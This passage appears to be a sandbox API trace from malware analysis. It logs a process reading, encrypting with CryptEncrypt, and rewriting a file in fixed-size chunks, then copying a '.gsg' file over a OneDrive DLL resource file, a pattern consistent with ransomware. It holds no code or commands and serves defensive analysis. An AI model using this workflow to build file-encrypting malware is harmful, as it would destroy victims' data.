returned 1 [0279.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.938] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.938] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.938] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.938] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.938] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.938] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.938] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.938] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.938] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.938] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.938] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.939] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.939] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.939] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.939] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.939] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.939] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.939] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.939] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.939] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.939] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.939] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.940] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.940] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.940] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.940] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.940] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.940] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.940] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.940] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.940] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.940] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.940] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.940] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.940] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.940] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.940] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.941] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.941] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.941] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.941] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.941] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.941] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.941] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.941] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.941] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.941] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.941] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.941] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.941] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.941] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.941] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.942] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.942] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.942] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.942] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.942] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.942] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.942] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.942] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.942] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.942] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.942] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.942] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.942] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.942] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.942] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.943] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.943] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.943] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.943] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.943] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.943] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.943] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.943] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.943] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.943] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.943] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.943] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.943] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.943] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.943] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.991] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x150, lpOverlapped=0x0) returned 1 [0279.992] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x150, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x160) returned 1 [0279.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x160, lpOverlapped=0x0) returned 1 [0279.992] CloseHandle (hObject=0x5d48) returned 1 [0279.992] CloseHandle (hObject=0x5d3c) returned 1 [0279.992] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0279.998] SetFileAttributesA 